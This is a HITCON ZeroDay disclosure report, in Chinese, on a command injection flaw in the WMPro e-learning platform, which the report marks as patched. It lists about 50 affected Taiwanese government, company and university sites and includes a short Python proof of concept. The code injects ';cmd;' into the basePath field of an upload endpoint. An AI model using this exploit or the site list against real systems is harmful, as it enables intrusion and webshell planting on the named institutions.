旭聯科技WMPro智慧大師 Command Injection - HITCON ZeroDay

Vulnerability Detail Report

Vulnerability Overview

  • ZDID: ZD-2019-00538
  •  發信 Vendor: 旭聯科技股份有限公司
  • Title: 旭聯科技WMPro智慧大師 Command Injection
  • Introduction: Command Injection ,可上傳webshell

處理狀態

目前狀態

公開
Last Update : 2019/10/19
  • 新提交
  • 已審核
  • 已通報
  • 已修補
  • 已複測
  • 公開

處理歷程

  • 2019/06/10 12:33:37 : 新提交 (由 alert(/pikachu/) 更新此狀態)
  • 2019/06/10 21:54:35 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2019/06/18 17:52:56 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2019/06/18 17:52:56 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2019/06/20 00:00:01 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2019/06/20 00:00:05 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2019/10/10 03:00:04 : 公開 (由 HITCON ZeroDay 平台自動更新)
  • 2019/10/17 17:34:16 : 複測申請中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2019/10/18 10:08:58 : 確認已修補 (由 alert(/pikachu/) 更新此狀態)
  • 2019/10/19 03:00:25 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

  • ZDID:ZD-2019-00538
  • 通報者:pikachu (alert(/pikachu/))
  • 風險:嚴重
  • 類型:指令注入攻擊 (Command Injection)

參考資料

攻擊者可經由該漏洞執行任意系統指令,取得系統權限,同時也有機會對資料進行破壞或修改。

漏洞說明: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection

漏洞說明: CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')
https://cwe.mitre.org/data/definitions/77.html
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)

相關網址

將近50個網站受到此漏洞影響, 列表如下.

1.政府機關
https://ups.moe.edu.tw/mooc/explorer.php
https://openstudy.wda.gov.tw/mooc/index.php
https://elearn.arte.gov.tw/mooc/index.php
https://mdcel.fda.gov.tw/mooc/index.php
https://icourse.tn.edu.tw/mooc/index.php
https://cu.ncl.edu.tw/mooc/index.php
https://ltc-learning.org/mooc/index.php
http://elearning.nmmst.gov.tw/mooc/index.php
https://ecollege.ntpc.gov.tw/mooc/explorer_comp.php
http://babyedu.sfaa.gov.tw/mooc/explorer.php

2.民間公司與法人協會
https://elearning.tbb.com.tw/mooc/index.php
https://www.way-e.net/mooc/index.php
http://flg.merrywood.com.tw/mooc/index.php
http://biolearn.347.com.tw/mooc/index.php
http://elearning.iti.org.tw/mooc/index.php

3.教育單位(大專院校等)
http://wmpro.nccu.edu.tw/mooc/explorer.php
http://wmpro.nccu.edu.tw/mooc/index.php
https://wm5.nccu.edu.tw/mooc/
https://elearn.cjcu.edu.tw/mooc/explorer.php
http://eschool.niu.edu.tw/mooc/explorer.php
http://elearn.fgu.edu.tw/mooc/index.php
http://wm.kmu.edu.tw/mooc/index.php
http://elearn.shu.edu.tw/mooc/index.php
http://elearning.ctust.edu.tw/mooc/index.php
https://elearning.nptu.edu.tw/mooc/index.php
http://elearning.nkust.edu.tw/mooc/index.php
https://dlearn.ncue.edu.tw/mooc/index.php
http://elearning.cnu.edu.tw/mooc/index.php
http://elearning2.ksu.edu.tw/mooc/index.php
https://elearning.usc.edu.tw/mooc/index.php
https://el.cgu.edu.tw/mooc/index.php
https://dlc.chihlee.edu.tw/mooc/index.php
https://spoc.chihlee.edu.tw/mooc/explorer.php
http://lod.nou.edu.tw/mooc/index.php
https://elearning.ntua.edu.tw/mooc/index.php
http://elearning.mcut.edu.tw/mooc/index.php
https://elearning.yuntech.edu.tw/index.php
http://ds.smc.edu.tw/mooc/index.php
http://ecampus.takming.edu.tw/mooc/index.php
http://wis.ocu.edu.tw/mooc/index.php
https://elearning.pu.edu.tw/mooc/index.php
http://moocs.cmgsh.tp.edu.tw/mooc/index.php
http://elearn.nutc.edu.tw/mooc/index.php
http://elearn.dahan.edu.tw/mooc/index.php
http://163.15.64.72/mooc/index.php
https://mooc.wzu.edu.tw/mooc/index.php
http://elearning.nkut.edu.tw/mooc/login.php
http://elearning.hsc.edu.tw/mooc/login.php
http://elearning.knu.edu.tw/mooc/login.php
http://elearning2.ksu.edu.tw/mooc/login.php.

敘述

POC程式如下

import sys
import base64
import codecs
import requests

url = '%s/teach/course/doajaxfileupload.php' % sys.argv[1]

temp_php = "JUST_IGNORE_ME.php"
temp_php_url = '%s/teach/course/%s' % (sys.argv[1], temp_php)

def run(cmd):
payload = ';%s;' % (cmd)
res = requests.post(url, data=dict(basePath=payload), headers={'User-Agent': 'elearn good', 'X-Http-Forwarded-For': '127.0.0.1'})
output = res.text
line_count = len(output.split('\n'))
if line_count > 1:
line_count = (line_count-1) // 6 + 1
return output.split('\n')[-line_count:-1]

擷圖

留言討論

聯絡組織

 發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。
;